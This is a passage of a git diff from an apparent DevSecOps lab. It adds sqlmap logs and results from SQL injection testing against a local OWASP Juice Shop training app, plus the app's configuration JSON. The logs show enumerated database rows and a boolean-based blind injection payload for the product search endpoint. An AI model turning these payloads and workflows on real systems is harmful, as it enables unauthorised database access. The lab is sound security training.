retrieving the length of query output + +[12:07:14] [INFO] retrieved: 30 +[12:07:15] [INFO] retrieved: ______________________________ +[12:07:15] [INFO] retrieved: +[12:07:18] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:07:18] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:07:18] [INFO] retrieving the length of query output + +[12:07:18] [INFO] retrieved: 9 +[12:07:18] [INFO] retrieved: _________ +[12:07:18] [INFO] retrieved: +[12:07:19] [INFO] retrieved: Injection +[12:07:19] [INFO] retrieved: Injection +[12:07:19] [INFO] retrieving the length of query output + +[12:07:19] [INFO] retrieved: 1 + +[12:07:19] [INFO] retrieved: 0 +[12:07:19] [INFO] retrieving the length of query output + +[12:07:19] [INFO] retrieved: 30 +[12:07:20] [INFO] retrieved: ______________________________ +[12:07:20] [INFO] retrieved: +[12:07:23] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:07:23] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:07:23] [INFO] retrieving the length of query output + +[12:07:23] [INFO] retrieved: 107 +[12:07:23] [INFO] retrieved: __________________________________ +[12:07:23] [INFO] retrieved: +[12:07:34] [INFO] retrieved: ..thout ever registering that user. +[12:07:34] [INFO] retrieved: Log in with the (non-existing) accountant acc0unt4nt@juice-sh.op without ever registering that user. +[12:07:34] [INFO] retrieving the length of query output + +[12:07:34] [INFO] retrieved: 1 + +[12:07:34] [INFO] retrieved: 4 +[12:07:34] [INFO] retrieving the length of query output + +[12:07:34] [INFO] retrieved: + +[12:07:34] [INFO] retrieved: +[12:07:34] [INFO] retrieving the length of query output + +[12:07:34] [INFO] retrieved: 1 + +[12:07:35] [INFO] retrieved: 0 +[12:07:35] [INFO] retrieving the length of query output + +[12:07:35] [INFO] retrieved: 2 +[12:07:35] [INFO] retrieved: __ +[12:07:35] [INFO] retrieved: +[12:07:35] [INFO] retrieved: 25 +[12:07:35] [INFO] retrieved: 25 +[12:07:35] [INFO] retrieving the length of query output + +[12:07:35] [INFO] retrieved: 28 +[12:07:38] [INFO] retrieved: ____________________________ +[12:07:38] [INFO] retrieved: +[12:07:41] [INFO] retrieved: ephemeralAccountantChallenge +[12:07:41] [INFO] retrieved: ephemeralAccountantChallenge +[12:07:41] [INFO] retrieving the length of query output + +[12:07:41] [INFO] retrieved: 88 +[12:07:41] [INFO] retrieved: __________________________________ +[12:07:41] [INFO] retrieved: +[12:07:50] [INFO] retrieved: ..ction_Prevention_Cheat_Sheet.html +[12:07:50] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html +[12:07:50] [INFO] retrieving the length of query output + +[12:07:50] [INFO] retrieved: 20 +[12:07:51] [INFO] retrieved: ____________________ +[12:07:51] [INFO] retrieved: +[12:07:53] [INFO] retrieved: Ephemeral Accountant +[12:07:53] [INFO] retrieved: Ephemeral Accountant +[12:07:53] [INFO] retrieving the length of query output + +[12:07:53] [INFO] retrieved: 1 + +[12:07:53] [INFO] retrieved: 0 +[12:07:53] [INFO] retrieving the length of query output + +[12:07:53] [INFO] retrieved: + +[12:07:53] [INFO] retrieved: +[12:07:53] [INFO] retrieving the length of query output + +[12:07:53] [INFO] retrieved: + +[12:07:53] [INFO] retrieved: +[12:07:53] [INFO] retrieving the length of query output + +[12:07:53] [INFO] retrieved: 30 +[12:07:53] [INFO] retrieved: ______________________________ +[12:07:53] [INFO] retrieved: +[12:07:57] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:07:57] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:07:57] [INFO] retrieving the length of query output + +[12:07:57] [INFO] retrieved: 25 +[12:07:57] [INFO] retrieved: _________________________ +[12:07:57] [INFO] retrieved: +[12:07:59] [INFO] retrieved: Security Misconfiguration +[12:08:00] [INFO] retrieved: Security Misconfiguration +[12:08:00] [INFO] retrieving the length of query output + +[12:08:00] [INFO] retrieved: 1 + +[12:08:00] [INFO] retrieved: 0 +[12:08:00] [INFO] retrieving the length of query output + +[12:08:00] [INFO] retrieved: 30 +[12:08:00] [INFO] retrieved: ______________________________ +[12:08:00] [INFO] retrieved: +[12:08:03] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:08:03] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:08:03] [INFO] retrieving the length of query output + +[12:08:03] [INFO] retrieved: 74 +[12:08:04] [INFO] retrieved: __________________________________ +[12:08:04] [INFO] retrieved: +[12:08:14] [INFO] retrieved: ..cefully nor consistently handled. +[12:08:14] [INFO] retrieved: Provoke an error that is neither very gracefully nor consistently handled. +[12:08:14] [INFO] retrieving the length of query output + +[12:08:14] [INFO] retrieved: 1 + +[12:08:14] [INFO] retrieved: 1 +[12:08:14] [INFO] retrieving the length of query output + +[12:08:14] [INFO] retrieved: + +[12:08:14] [INFO] retrieved: +[12:08:15] [INFO] retrieving the length of query output + +[12:08:15] [INFO] retrieved: 1 + +[12:08:15] [INFO] retrieved: 0 +[12:08:15] [INFO] retrieving the length of query output + +[12:08:15] [INFO] retrieved: 2 +[12:08:15] [INFO] retrieved: __ +[12:08:15] [INFO] retrieved: +[12:08:15] [INFO] retrieved: 26 +[12:08:15] [INFO] retrieved: 26 +[12:08:15] [INFO] retrieving the length of query output + +[12:08:15] [INFO] retrieved: 22 +[12:08:15] [INFO] retrieved: ______________________ +[12:08:15] [INFO] retrieved: +[12:08:18] [INFO] retrieved: errorHandlingChallenge +[12:08:18] [INFO] retrieved: errorHandlingChallenge +[12:08:18] [INFO] retrieving the length of query output + +[12:08:18] [INFO] retrieved: 78 +[12:08:18] [INFO] retrieved: __________________________________ +[12:08:18] [INFO] retrieved: +[12:08:26] [INFO] retrieved: ..s/Error_Handling_Cheat_Sheet.html +[12:08:26] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Error_Handling_Cheat_Sheet.html +[12:08:26] [INFO] retrieving the length of query output + +[12:08:26] [INFO] retrieved: 14 +[12:08:26] [INFO] retrieved: ______________ +[12:08:26] [INFO] retrieved: +[12:08:27] [INFO] retrieved: Error Handling +[12:08:28] [INFO] retrieved: Error Handling +[12:08:28] [INFO] retrieving the length of query output + +[12:08:28] [INFO] retrieved: 1 + +[12:08:28] [INFO] retrieved: 1 +[12:08:28] [INFO] retrieving the length of query output + +[12:08:28] [INFO] retrieved: 12 +[12:08:28] [INFO] retrieved: ____________ +[12:08:28] [INFO] retrieved: +[12:08:29] [INFO] retrieved: Prerequisite +[12:08:29] [INFO] retrieved: Prerequisite +[12:08:29] [INFO] retrieving the length of query output + +[12:08:29] [INFO] retrieved: + +[12:08:29] [INFO] retrieved: +[12:08:30] [INFO] retrieving the length of query output + +[12:08:30] [INFO] retrieved: 30 +[12:08:30] [INFO] retrieved: ______________________________ +[12:08:30] [INFO] retrieved: +[12:08:33] [INFO] retrieved: 2026-05-08 08:35:58.970 +00:00 +[12:08:33] [INFO] retrieved: 2026-05-08 08:35:58.970 +00:00 +[12:08:33] [INFO] retrieving the length of query output + +[12:08:33] [INFO] retrieved: 25 +[12:08:33] [INFO] retrieved: _________________________ +[12:08:33] [INFO] retrieved: +[12:08:36] [INFO] retrieved: Improper Input Validation +[12:08:36] [INFO] retrieved: Improper Input Validation +[12:08:36] [INFO] retrieving the length of query output + +[12:08:36] [INFO] retrieved: 1 + +[12:08:36] [INFO] retrieved: 0 +[12:08:36] [INFO] retrieving the length of query output + +[12:08:36] [INFO] retrieved: 30 +[12:08:36] [INFO] retrieved: ______________________________ +[12:08:36] [INFO] retrieved: +[12:08:40] [INFO] retrieved: 2026-05-08 08:29:59.467 +00:00 +[12:08:40] [INFO] retrieved: 2026-05-08 08:29:59.467 +00:00 +[12:08:40] [INFO] retrieving the length of query output + +[12:08:40] [INFO] retrieved: 52 +[12:08:40] [INFO] retrieved: __________________________________ +[12:08:40] [INFO] retrieved: +[12:08:45] [INFO] retrieved: .. an expired campaign coupon code. +[12:08:45] [INFO] retrieved: Successfully redeem an expired campaign coupon code. +[12:08:45] [INFO] retrieving the length of query output + +[12:08:45] [INFO] retrieved: 1 + +[12:08:45] [INFO] retrieved: 4 +[12:08:46] [INFO] retrieving the length of query output + +[12:08:46] [INFO] retrieved: + +[12:08:46] [INFO] retrieved: +[12:08:46] [INFO] retrieving the length of query output + +[12:08:46] [INFO] retrieved: 1 + +[12:08:46] [INFO] retrieved: 0 +[12:08:46] [INFO] retrieving the length of query output + +[12:08:46] [INFO] retrieved: 2 +[12:08:46] [INFO] retrieved: __ +[12:08:46] [INFO] retrieved: +[12:08:46] [INFO] retrieved: 27 +[12:08:46] [INFO] retrieved: 27 +[12:08:46] [INFO] retrieving the length of query output + +[12:08:46] [INFO] retrieved: 24 +[12:08:47] [INFO] retrieved: ________________________ +[12:08:47] [INFO] retrieved: +[12:08:49] [INFO] retrieved: manipulateClockChallenge +[12:08:49] [INFO] retrieved: manipulateClockChallenge +[12:08:49] [INFO] retrieving the length of query output + +[12:08:49] [INFO] retrieved: + +[12:08:49] [INFO] retrieved: +[12:08:49] [INFO] retrieving the length of query output + +[12:08:49] [INFO] retrieved: 14 +[12:08:49] [INFO] retrieved: ______________ +[12:08:49] [INFO] retrieved: +[12:08:51] [INFO] retrieved: Expired Coupon +[12:08:51] [INFO] retrieved: Expired Coupon +[12:08:51] [INFO] retrieving the length of query output + +[12:08:51] [INFO] retrieved: 1 + +[12:08:51] [INFO] retrieved: 0 +[12:08:51] [INFO] retrieving the length of query output + +[12:08:51] [INFO] retrieved: + +[12:08:51] [INFO] retrieved: +[12:08:52] [INFO] retrieving the length of query output + +[12:08:52] [INFO] retrieved: + +[12:08:52] [INFO] retrieved: +[12:08:52] [INFO] retrieving the length of query output + +[12:08:52] [INFO] retrieved: 30 +[12:08:52] [INFO] retrieved: ______________________________ +[12:08:52] [INFO] retrieved: +[12:08:55] [INFO] retrieved: 2026-05-08 08:29:59.467 +00:00 +[12:08:56] [INFO] retrieved: 2026-05-08 08:29:59.467 +00:00 +[12:08:56] [INFO] retrieving the length of query output + +[12:08:56] [INFO] retrieved: 22 +[12:08:56] [INFO] retrieved: ______________________ +[12:08:56] [INFO] retrieved: +[12:08:59] [INFO] retrieved: Broken Anti Automation +[12:08:59] [INFO] retrieved: Broken Anti Automation +[12:08:59] [INFO] retrieving the length of query output + +[12:08:59] [INFO] retrieved: 1 + +[12:08:59] [INFO] retrieved: 0 +[12:08:59] [INFO] retrieving the length of query output + +[12:08:59] [INFO] retrieved: 30 +[12:08:59] [INFO] retrieved: ______________________________ +[12:08:59] [INFO] retrieved: +[12:09:07] [INFO] retrieved: 2026-05-08 08:29:59.467 +00:00 +[12:09:07] [INFO] retrieved: 2026-05-08 08:29:59.467 +00:00 +[12:09:07] [INFO] retrieving the length of query output + +[12:09:07] [INFO] retrieved: 90 +[12:09:07] [INFO] retrieved: __________________________________ +[12:09:07] [INFO] retrieved: [?1l> \ No newline at end of file diff --git a/labs/lab5/sqlmap/results-05082026_1141am.csv b/labs/lab5/sqlmap/results-05082026_1141am.csv new file mode 100644 index 00000000..3f9bd534 --- /dev/null +++ b/labs/lab5/sqlmap/results-05082026_1141am.csv @@ -0,0 +1,2 @@ +Target URL,Place,Parameter,Technique(s),Note(s) +http://localhost:3000/rest/products/search?q=,URI,#1*,B, diff --git a/labs/lab5/sqlmap/results-05082026_1148am.csv b/labs/lab5/sqlmap/results-05082026_1148am.csv new file mode 100644 index 00000000..10ae6874 --- /dev/null +++ b/labs/lab5/sqlmap/results-05082026_1148am.csv @@ -0,0 +1,2 @@ +Target URL,Place,Parameter,Technique(s),Note(s) +http://localhost:3000/rest/user/login,(custom) POST,JSON #1*,B, diff --git a/labs/lab5/sqlmap/search-scan.log b/labs/lab5/sqlmap/search-scan.log new file mode 100644 index 00000000..cc4a6843 --- /dev/null +++ b/labs/lab5/sqlmap/search-scan.log @@ -0,0 +1,53 @@ + ___ + __H__ + ___ ___[.]_____ ___ ___ {1.8.4#stable} +|_ -| . [)] | .'| . | +|___|_ [']_|_|_|__,| _| + |_|V... |_| https://sqlmap.org + +[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program + +[*] starting @ 11:41:48 /2026-05-08/ + +[?1049h(B[?7h[?1049l [?1l>[11:41:48] [WARNING] using '/home/nodo/DevSecOps/DevSecOps-Intro/labs/lab5/sqlmap' as the output directory +[1/1] URL: +GET http://localhost:3000/rest/products/search?q=* +do you want to test this URL? [Y/n/q] +> Y +[11:41:48] [INFO] testing URL 'http://localhost:3000/rest/products/search?q=*' +custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y +[11:41:48] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly +[11:41:48] [INFO] using '/home/nodo/DevSecOps/DevSecOps-Intro/labs/lab5/sqlmap/results-05082026_1141am.csv' as the CSV results file in multiple targets mode +[11:41:48] [INFO] testing connection to the target URL +[11:41:48] [INFO] checking if the target is protected by some kind of WAF/IPS +[11:41:49] [INFO] testing if the target URL content is stable +[11:41:49] [INFO] target URL content is stable +[11:41:49] [INFO] testing if URI parameter '#1*' is dynamic +[11:41:49] [INFO] URI parameter '#1*' appears to be dynamic +[11:41:49] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable +[11:41:49] [INFO] testing for SQL injection on URI parameter '#1*' +[11:41:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' +[11:41:49] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="The") +[11:41:49] [INFO] checking if the injection point on URI parameter '#1*' is a false positive +[11:41:50] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected +URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N +sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests: +--- +Parameter: #1* (URI) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: http://localhost:3000/rest/products/search?q=') AND 6621=6621 AND ('qNtz' LIKE 'qNtz +--- +do you want to exploit this SQL injection? [Y/n] Y +[11:41:50] [INFO] testing SQLite +[11:41:50] [INFO] confirming SQLite +[11:41:50] [INFO] actively fingerprinting SQLite +[11:41:50] [INFO] the back-end DBMS is SQLite +back-end DBMS: SQLite +[11:41:50] [WARNING] HTTP error codes detected during run: +500 (Internal Server Error) - 10 times +[11:41:50] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/nodo/DevSecOps/DevSecOps-Intro/labs/lab5/sqlmap/results-05082026_1141am.csv' +[11:41:50] [WARNING] your sqlmap version is outdated + +[*] ending @ 11:41:50 /2026-05-08/ + diff --git a/labs/lab5/zap/admin-application-configuration.json b/labs/lab5/zap/admin-application-configuration.json new file mode 100644 index 00000000..2b566e94 --- /dev/null +++ b/labs/lab5/zap/admin-application-configuration.json @@ -0,0 +1 @@ +{"config":{"server":{"port":3000,"basePath":"","baseUrl":"http://localhost:3000"},"application":{"domain":"juice-sh.op","name":"OWASP Juice Shop","logo":"JuiceShop_Logo.png","favicon":"favicon_js.ico","theme":"bluegrey-lightgreen","showVersionNumber":true,"showGitHubLinks":true,"localBackupEnabled":true,"numberOfRandomFakeUsers":0,"altcoinName":"Juicycoin","privacyContactEmail":"donotreply@owasp-juice.shop","customMetricsPrefix":"juiceshop","chatBot":{"name":"Juicy","greeting":"Nice to meet you , I'm ","trainingData":"botDefaultTrainingData.json","defaultResponse":"Sorry I couldn't understand what you were trying to say","avatar":"JuicyChatBot.png"},"social":{"blueSkyUrl":"https://bsky.app/profile/owasp-juice.shop","mastodonUrl":"https://fosstodon.org/@owasp_juiceshop","twitterUrl":"https://twitter.com/owasp_juiceshop","facebookUrl":"https://www.facebook.com/owasp.juiceshop","slackUrl":"https://owasp.org/slack/invite","redditUrl":"https://www.reddit.com/r/owasp_juiceshop","pressKitUrl":"https://github.com/OWASP/owasp-swag/tree/master/projects/juice-shop","nftUrl":"https://opensea.io/collection/juice-shop","questionnaireUrl":null},"recyclePage":{"topProductImage":"fruit_press.jpg","bottomProductImage":"apple_pressings.jpg"},"welcomeBanner":{"showOnFirstStart":true,"title":"Welcome to OWASP Juice Shop!","message":"

Being a web application with a vast number of intended security vulnerabilities, the OWASP Juice Shop is supposed to be the opposite of a best practice or template application for web developers: It is an awareness, training, demonstration and exercise tool for security risks in modern web applications. The OWASP Juice Shop is an open-source project hosted by the non-profit Open Worldwide Application Security Project (OWASP) and is developed and maintained by volunteers. Check out the link below for more information and documentation on the project.

https://owasp-juice.shop

"},"cookieConsent":{"message":"This website uses fruit cookies to ensure you get the juiciest tracking experience.","dismissText":"Me want it!","linkText":"But me wait!","linkUrl":"https://www.youtube.com/watch?v=9PnbKL3wuH4"},"securityTxt":{"contact":"mailto:donotreply@owasp-juice.shop","encryption":"https://keybase.io/bkimminich/pgp_keys.asc?fingerprint=19c01cb7157e4645e9e2c863062a85a8cbfbdcda","acknowledgements":"/#/score-board","hiring":"/#/jobs","csaf":"/.well-known/csaf/provider-metadata.json"},"promotion":{"video":"owasp_promo.mp4","subtitles":"owasp_promo.vtt"},"easterEggPlanet":{"name":"Orangeuze","overlayMap":"orangemap2k.jpg"},"googleOauth":{"clientId":"1005568560502-6hm16lef8oh46hr2d98vf2ohlnj4nfhq.apps.googleusercontent.com","authorizedRedirects":[{"uri":"https://demo.owasp-juice.shop"},{"uri":"https://juice-shop.herokuapp.com"},{"uri":"https://preview.owasp-juice.shop"},{"uri":"https://juice-shop-staging.herokuapp.com"},{"uri":"https://juice-shop.wtf"},{"uri":"http://localhost:3000","proxy":"https://local3000.owasp-juice.shop"},{"uri":"http://127.0.0.1:3000","proxy":"https://local3000.owasp-juice.shop"},{"uri":"http://localhost:4200","proxy":"https://local4200.owasp-juice.shop"},{"uri":"http://127.0.0.1:4200","proxy":"https://local4200.owasp-juice.shop"},{"uri":"http://192.168.99.100:3000","proxy":"https://localmac.owasp-juice.shop"},{"uri":"http://192.168.99.100:4200","proxy":"https://localmac.owasp-juice.shop"},{"uri":"http://penguin.termina.linux.test:3000","proxy":"https://localchromeos.owasp-juice.shop"},{"uri":"http://penguin.termina.linux.test:4200","proxy":"https://localchromeos.owasp-juice.shop"}]}},"challenges":{"showSolvedNotifications":true,"showHints":true,"showMitigations":true,"codingChallengesEnabled":"solved","restrictToTutorialsFirst":false,"overwriteUrlForProductTamperingChallenge":"https://owasp.slack.com","xssBonusPayload":"","safetyMode":"auto","showFeedbackButtons":true,"csafHashValue":"7e7ce7c65db3bf0625fcea4573d25cff41f2f7e3474f2c74334b14fc65bb4fd26af802ad17a3a03bf0eee6827a00fb8f7905f338c31b5e6ea9cb31620242e843","metricsIgnoredUserAgents":["Prometheus","Alloy","promscrape","otelcol"]},"hackingInstructor":{"isEnabled":true,"avatarImage":"JuicyBot.png","hintPlaybackSpeed":"normal"},"products":[{"name":"Apple Juice (1000ml)","price":1.99,"deluxePrice":0.99,"limitPerUser":5,"description":"The all-time classic.","image":"apple_juice.jpg","reviews":[{"text":"One of my favorites!","author":"admin"}]},{"name":"Orange Juice (1000ml)","description":"Made from oranges hand-picked by Uncle Dittmeyer.","price":2.99,"deluxePrice":2.49,"image":"orange_juice.jpg","reviews":[{"text":"y0ur f1r3wall needs m0r3 musc13","author":"uvogin"}]},{"name":"Eggfruit Juice (500ml)","description":"Now with even more exotic flavour.","price":8.99,"image":"eggfruit_juice.jpg","reviews":[{"text":"I bought it, would buy again. 5/7","author":"admin"}]},{"name":"Raspberry Juice (1000ml)","description":"Made from blended Raspberry Pi, water and sugar.","price":4.99,"image":"raspberry_juice.jpg"},{"name":"Lemon Juice (500ml)","description":"Sour but full of vitamins.","price":2.99,"deluxePrice":1.99,"limitPerUser":5,"image":"lemon_juice.jpg"},{"name":"Banana Juice (1000ml)","description":"Monkeys love it the most.","price":1.99,"image":"banana_juice.jpg","reviews":[{"text":"Fry liked it too.","author":"bender"}]},{"name":"OWASP Juice Shop T-Shirt","description":"Real fans wear it 24/7!","price":22.49,"limitPerUser":5,"image":"fan_shirt.jpg"},{"name":"OWASP Juice Shop CTF Girlie-Shirt","description":"For serious Capture-the-Flag heroines only!","price":22.49,"image":"fan_girlie.jpg"},{"name":"OWASP SSL Advanced Forensic Tool (O-Saft)","description":"O-Saft is an easy to use tool to show information about SSL certificate and tests the SSL connection according given list of ciphers and various SSL configurations.","price":0.01,"image":"orange_juice.jpg","urlForProductTamperingChallenge":"https://www.owasp.org/index.php/O-Saft"},{"name":"Christmas Super-Surprise-Box (2014 Edition)","description":"Contains a random selection of 10 bottles (each 500ml) of our tastiest juices and an extra fan shirt for an unbeatable price!","price":29.99,"image":"undefined.jpg","useForChristmasSpecialChallenge":true},{"name":"Rippertuer Special Juice","description":"Contains a magical collection of the rarest fruits gathered from all around the world, like Cherymoya Annona cherimola, Jabuticaba Myrciaria cauliflora, Bael Aegle marmelos... and others, at an unbelievable price!
This item has been made unavailable because of lack of safety standards.","price":16.99,"image":"undefined.jpg","keywordsForPastebinDataLeakChallenge":["hueteroneel","eurogium edule"]},{"name":"OWASP Juice Shop Sticker (2015/2016 design)","description":"Die-cut sticker with the official 2015/2016 logo. By now this is a rare collectors item. Out of stock!","price":999.99,"image":"sticker.png","deletedDate":"2017-04-28"},{"name":"OWASP Juice Shop Iron-Ons (16pcs)","description":"Upgrade your clothes with washer safe iron-ons of the OWASP Juice Shop or CTF Extension logo!","price":14.99,"image":"iron-on.jpg"},{"name":"OWASP Juice Shop Magnets (16pcs)","description":"Your fridge will be even cooler with these OWASP Juice Shop or CTF Extension logo magnets!","price":15.99,"image":"magnets.jpg"},{"name":"OWASP Juice Shop Sticker Page","description":"Massive decoration opportunities with these OWASP Juice Shop or CTF Extension sticker pages! Each page has 16 stickers on it.","price":9.99,"image":"sticker_page.jpg"},{"name":"OWASP Juice Shop Sticker Single","description":"Super high-quality vinyl sticker single with the OWASP Juice Shop or CTF Extension logo! The ultimate laptop decal!","price":4.99,"image":"sticker_single.jpg"},{"name":"OWASP Juice Shop Temporary Tattoos (16pcs)","description":"Get one of these temporary tattoos to proudly wear the OWASP Juice Shop or CTF Extension logo on your skin! If you tweet a photo of yourself with the tattoo, you get a couple of our stickers for free! Please mention @owasp_juiceshop in your tweet!","price":14.99,"image":"tattoo.jpg","reviews":[{"text":"I straight-up gots nuff props fo'these tattoos!","author":"rapper"}]},{"name":"OWASP Juice Shop Mug","description":"Black mug with regular logo on one side and CTF logo on the other! Your colleagues will envy you!","price":21.99,"image":"fan_mug.jpg"},{"name":"OWASP Juice Shop Hoodie","description":"Mr. Robot-style apparel. But in black. And with logo.","price":49.99,"image":"fan_hoodie.jpg"},{"name":"OWASP Juice Shop-CTF Velcro Patch","description":"4x3.5\" embroidered patch with velcro backside. The ultimate decal for every tactical bag or backpack!","price":2.92,"quantity":5,"limitPerUser":5,"image":"velcro-patch.jpg","reviews":[{"text":"This thang would look phat on Bobby's jacked fur coat!","author":"rapper"},{"text":"Looks so much better on my uniform than the boring Starfleet symbol.","author":"jim"}]},{"name":"Woodruff Syrup \"Forest Master X-Treme\"","description":"Harvested and manufactured in the Black Forest, Germany. Can cause hyperactive behavior in children. Can cause permanent green tongue when consumed undiluted.","price":6.99,"image":"woodruff_syrup.jpg"},{"name":"Green Smoothie","description":"Looks poisonous but is actually very good for your health! Made from green cabbage, spinach, kiwi and grass.","price":1.99,"image":"green_smoothie.jpg","reviews":[{"text":"Fresh out of a replicator.","author":"jim"}]},{"name":"Quince Juice (1000ml)","description":"Juice of the Cydonia oblonga fruit. Not exactly sweet but rich in Vitamin C.","price":4.99,"image":"quince.jpg"},{"name":"Apple Pomace","description":"Finest pressings of apples. Allergy disclaimer: Might contain traces of worms. Can be sent back to us for recycling.","price":0.89,"limitPerUser":5,"image":"apple_pressings.jpg"},{"name":"Fruit Press","description":"Fruits go in. Juice comes out. Pomace you can send back to us for recycling purposes.","price":89.99,"image":"fruit_press.jpg"},{"name":"OWASP Juice Shop Logo (3D-printed)","description":"This rare item was designed and handcrafted in Sweden. This is why it is so incredibly expensive despite its complete lack of purpose.","price":99.99,"image":"3d_keychain.jpg","fileForRetrieveBlueprintChallenge":"JuiceShop.stl","exifForBlueprintChallenge":["OpenSCAD"]},{"name":"Juice Shop Artwork","description":"Unique masterpiece painted with different kinds of juice on 90g/m² lined paper.","price":278.74,"quantity":0,"image":"artwork.jpg","deletedDate":"2020-12-24"},{"name":"Global OWASP WASPY Award 2017 Nomination","description":"Your chance to nominate up to three quiet pillars of the OWASP community ends 2017-06-30! Nominate now!","price":0.03,"image":"waspy.png","deletedDate":"2017-07-01"},{"name":"Strawberry Juice (500ml)","description":"Sweet & tasty!","price":3.99,"image":"strawberry_juice.jpeg"},{"name":"Carrot Juice (1000ml)","description":"As the old German saying goes: \"Carrots are good for the eyes. Or has anyone ever seen a rabbit with glasses?\"","price":2.99,"image":"carrot_juice.jpeg","reviews":[{"text":"0 st4rs f0r 7h3 h0rr1bl3 s3cur17y","author":"uvogin"}]},{"name":"OWASP Juice Shop Sweden Tour 2017 Sticker Sheet (Special Edition)","description":"10 sheets of Sweden-themed stickers with 15 stickers on each.","price":19.1,"image":"stickersheet_se.png","deletedDate":"2017-09-20"},{"name":"Pwning OWASP Juice Shop","description":"The official Companion Guide by Björn Kimminich available for free on LeanPub and also readable online!","price":5.99,"image":"cover_small.jpg","reviews":[{"text":"Even more interesting than watching Interdimensional Cable!","author":"morty"}]},{"name":"Melon Bike (Comeback-Product 2018 Edition)","description":"The wheels of this bicycle are made from real water melons. You might not want to ride it up/down the curb too hard.","price":2999,"quantity":3,"limitPerUser":1,"image":"melon_bike.jpeg"},{"name":"OWASP Juice Shop Coaster (10pcs)","description":"Our 95mm circle coasters are printed in full color and made from thick, premium coaster board.","price":19.99,"quantity":0,"image":"coaster.jpg"},{"name":"OWASP Snakes and Ladders - Web Applications","description":"This amazing web application security awareness board game is available for Tabletop Simulator on Steam Workshop now!","price":0.01,"quantity":8,"image":"snakes_ladders.jpg","reviews":[{"text":"Wait for a 10$ Steam sale of Tabletop Simulator!","author":"bjoernOwasp"}]},{"name":"OWASP Snakes and Ladders - Mobile Apps","description":"This amazing mobile app security awareness board game is available for Tabletop Simulator on Steam Workshop now!","price":0.01,"quantity":0,"image":"snakes_ladders_m.jpg","reviews":[{"text":"Here yo' learn how tha fuck ta not show yo' goddamn phone on camera!","author":"rapper"}]},{"name":"OWASP Juice Shop Holographic Sticker","description":"Die-cut holographic sticker. Stand out from those 08/15-sticker-covered laptops with this shiny beacon of 80's coolness!","price":2,"quantity":0,"image":"holo_sticker.png","reviews":[{"text":"Rad, dude!","author":"rapper"},{"text":"Looks spacy on Bones' new tricorder!","author":"jim"},{"text":"Will put one on the Planet Express ship's bumper!","author":"bender"}]},{"name":"OWASP Juice Shop \"King of the Hill\" Facemask","description":"Facemask with compartment for filter from 50% cotton and 50% polyester.","price":13.49,"quantity":0,"limitPerUser":1,"image":"fan_facemask.jpg","reviews":[{"text":"K33p5 y0ur ju1cy 5plu773r 70 y0ur53lf!","author":"uvogin"},{"text":"Puny mask for puny human weaklings!","author":"bender"}]},{"name":"Juice Shop Adversary Trading Card (Common)","description":"Common rarity \"Juice Shop\" card for the Adversary Trading Cards CCG.","price":2.99,"deluxePrice":0.99,"deletedDate":"2020-11-30","limitPerUser":5,"image":"ccg_common.png","reviews":[{"text":"Ooooh, puny human playing Mau Mau, now?","author":"bender"}]},{"name":"Juice Shop Adversary Trading Card (Super Rare)","description":"Super rare \"Juice Shop\" card with holographic foil-coating for the Adversary Trading Cards CCG.","price":99.99,"deluxePrice":69.99,"deletedDate":"2020-11-30","quantity":2,"limitPerUser":1,"image":"ccg_foil.png","reviews":[{"text":"Mau Mau with bling-bling? Humans are so pathetic!","author":"bender"}]},{"name":"Juice Shop \"Permafrost\" 2020 Edition","description":"Exact version of OWASP Juice Shop that was archived on 02/02/2020 by the GitHub Archive Program and ultimately went into the Arctic Code Vault on July 8. 2020 where it will be safely stored for at least 1000 years.","price":9999.99,"quantity":1,"limitPerUser":1,"image":"permafrost.jpg","reviews":[{"text":"🧊 Let it go, let it go 🎶 Can't hold it back anymore 🎶 Let it go, let it go 🎶 Turn away and slam the door ❄️","author":"rapper"}]},{"name":"Best Juice Shop Salesman Artwork","description":"Unique digital painting depicting Stan, our most qualified and almost profitable salesman. He made a succesful carreer in selling used ships, coffins, krypts, crosses, real estate, life insurance, restaurant supplies, voodoo enhanced asbestos and courtroom souvenirs before finally adding his expertise to the Juice Shop marketing team.","price":5000,"quantity":1,"image":"artwork2.jpg","reviews":[{"text":"I'd stand on my head to make you a deal for this piece of art.","author":"stan"},{"text":"Just when my opinion of humans couldn't get any lower, along comes Stan...","author":"bender"}]},{"name":"OWASP Juice Shop Card (non-foil)","description":"Mythic rare (obviously...) card \"OWASP Juice Shop\" with three distinctly useful abilities. Alpha printing, mint condition. A true collectors piece to own!","price":1000,"quantity":3,"limitPerUser":1,"image":"card_alpha.jpg","reviews":[{"text":"DO NOT PLAY WITH THIS! Double-sleeve, then put it in the GitHub Arctic Vault for perfect preservation and boost of secondary market value!","author":"accountant"}]},{"name":"20th Anniversary Celebration Ticket","description":"Get your free 🎫 for OWASP 20th Anniversary Celebration online conference! Hear from world renowned keynotes and special speakers, network with your peers and interact with our event sponsors. With an anticipated 10k+ attendees from around the world, you will not want to miss this live on-line event!","price":1e-20,"deletedDate":"2021-09-25","limitPerUser":1,"image":"20th.jpeg","reviews":[{"text":"I'll be there! Will you, 